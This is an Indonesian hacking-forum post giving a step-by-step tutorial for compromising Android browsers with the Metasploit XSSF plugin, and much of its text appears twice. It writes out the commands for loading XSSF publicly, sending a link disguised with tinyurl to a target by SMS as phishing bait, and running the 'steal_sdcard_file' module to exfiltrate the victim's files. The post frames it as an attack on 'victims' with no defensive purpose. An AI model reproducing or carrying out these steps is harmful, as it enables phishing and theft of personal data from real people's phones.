11-24-2013, 07:52 AM
halo semua selamat pagi 
di minggu yang cerah ini saya akan nyepam dikit. mohon jangan di masukin hati kalau ada yang kurang berkenan nanti ya :-bd
kalau misalnya sudah pernah ada yang posting saya minta maaf ya, jujur pada saat saya melakukan pencarian di forum tidak di temukan thread yang sama.
kalau begitu langsung saja kita buka kali linux, backtrack, bugtraq, atau apapun yang penting bisa di pasang msfconsole ya.
langsung download dulu xssf pada directory msfconsolenya.
setelah itu kita jalankan metasploit kita \m/
lalu masukan
di atas itu adalah beberapa link yang merupakan ip dari attacker yang bisa di sembunyikan dengan tinyurl dll sebagai umpan pishing dan xssf home attacker dimana attacker bisa melihat log dari korban.
sekarang lihat msfconsole kita, dan copy link di sebelah [+] XSSF logs page dan paste ke web browser kesayangan anda.
maka akan muncul pemandangan seperti itu.
sekarang lihat lah bagian [+] XSSF test page dan copy link di sampingnya, lalu paste kirimkan ke android target anda lewat sms atau apapun. bisa di tutup menggunakan tinyurl atau semacamnya.
karena saya tidak punya android, maka saya pake vbox saja ya =))
pada saat korban membuka link tersebut maka koban akan menyaksikan pemandangan seperti ini
dan kita akan mendapatkan pemandangan seperti ini
new victim registered. tandanya korban sudah tersambung dengan msfconsole kita, sekarang kita buka browser milik kita yang sudah di buka link xssf tadi. maka akan muncul log dari si korban
tinggal klik saja tulisan victimnya.
sekarang coba saja kita ketik
sekarang android sudah resmi kena exploit, dan sekarang giliran kita untuk berkreasi mau di apakan android tersebut.
dengan:
mau curi filenya?
bisa dengan memilih:
dan run
dan secara otomatis android korban mengaksesnya dan nantinya akan muncul di log browser kita.
tapi berhubung android saya tidak ada isinya karena hanya virtual, jadi kagak muncul apa".
silahkan di kembangkan sendiri dan bila ada yang lebih asik, silahkan di postingkan ke forum.
mohon maaf kalau ada yang kurang berkenan. hanya share saja semoga bermanfaat \m/
di minggu yang cerah ini saya akan nyepam dikit. mohon jangan di masukin hati kalau ada yang kurang berkenan nanti ya :-bd
kalau misalnya sudah pernah ada yang posting saya minta maaf ya, jujur pada saat saya melakukan pencarian di forum tidak di temukan thread yang sama.
Spoiler! :
![[Image: 1460990_689962617680709_1249227499_n.jpg]](https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1460990_689962617680709_1249227499_n.jpg)
kalau begitu langsung saja kita buka kali linux, backtrack, bugtraq, atau apapun yang penting bisa di pasang msfconsole ya.
langsung download dulu xssf pada directory msfconsolenya.
Quote:svn export http://xssf.googlecode.com/svn/trunk ./ --force
Spoiler! :
![[Image: 1467453_689962744347363_873054418_n.jpg]](https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-frc3/q71/s720x720/1467453_689962744347363_873054418_n.jpg)
setelah itu kita jalankan metasploit kita \m/
Quote:msfconsole
dan isikan
load xssf Port=80 Uri=/Xssf/ Public=true Mode=Verbose
Spoiler! :
![[Image: 1454734_689962704347367_1030133023_n.jpg]](https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash3/q71/s720x720/1454734_689962704347367_1030133023_n.jpg)
lalu masukan
Quote:xssf_urlsmaka akan muncul penampakan seperti ini
Spoiler! :
![[Image: 1470402_689962774347360_487717187_n.jpg]](https://fbcdn-sphotos-a-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1470402_689962774347360_487717187_n.jpg)
sekarang lihat msfconsole kita, dan copy link di sebelah [+] XSSF logs page dan paste ke web browser kesayangan anda.
Spoiler! :
![[Image: 1470237_689962997680671_757338044_n.jpg]](https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash4/q71/s720x720/1470237_689962997680671_757338044_n.jpg)
sekarang lihat lah bagian [+] XSSF test page dan copy link di sampingnya, lalu paste kirimkan ke android target anda lewat sms atau apapun. bisa di tutup menggunakan tinyurl atau semacamnya.
karena saya tidak punya android, maka saya pake vbox saja ya =))
Spoiler! :
![[Image: 1453377_689962974347340_1417305574_n.jpg]](https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1453377_689962974347340_1417305574_n.jpg)
pada saat korban membuka link tersebut maka koban akan menyaksikan pemandangan seperti ini
Spoiler! :
![[Image: 1455092_689963107680660_1504504363_n.jpg]](https://fbcdn-sphotos-a-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1455092_689963107680660_1504504363_n.jpg)
dan kita akan mendapatkan pemandangan seperti ini
Spoiler! :
![[Image: 1422603_689963164347321_1348717999_n.jpg]](https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-frc3/q71/s720x720/1422603_689963164347321_1348717999_n.jpg)
Spoiler! :
![[Image: 1466217_689963174347320_466036619_n.jpg]](https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1466217_689963174347320_466036619_n.jpg)
sekarang coba saja kita ketik
Quote:xssf_information 1tadaaa. nongol dah tuh infonya si korban.
Spoiler! :
![[Image: 994369_689963254347312_857904323_n.jpg]](https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-prn1/q71/s720x720/994369_689963254347312_857904323_n.jpg)
sekarang android sudah resmi kena exploit, dan sekarang giliran kita untuk berkreasi mau di apakan android tersebut.
dengan:
Quote:search auxiliary/xssf
mau curi filenya?
bisa dengan memilih:
Quote:use auxiliary/xssf/public/android/steal_sdcard_file
Spoiler! :
![[Image: 1461235_689963357680635_1083694086_n.jpg]](https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-frc3/q71/s720x720/1461235_689963357680635_1083694086_n.jpg)
Spoiler! :
![[Image: 1468557_689963344347303_1074165059_n.jpg]](https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-frc3/q71/s720x720/1468557_689963344347303_1074165059_n.jpg)
dan secara otomatis android korban mengaksesnya dan nantinya akan muncul di log browser kita.
Spoiler! :
![[Image: 1473054_689963364347301_888857908_n.jpg]](https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1473054_689963364347301_888857908_n.jpg)
tapi berhubung android saya tidak ada isinya karena hanya virtual, jadi kagak muncul apa".
silahkan di kembangkan sendiri dan bila ada yang lebih asik, silahkan di postingkan ke forum.
mohon maaf kalau ada yang kurang berkenan. hanya share saja semoga bermanfaat \m/
Information Is The Most Dangerous Weapon In The World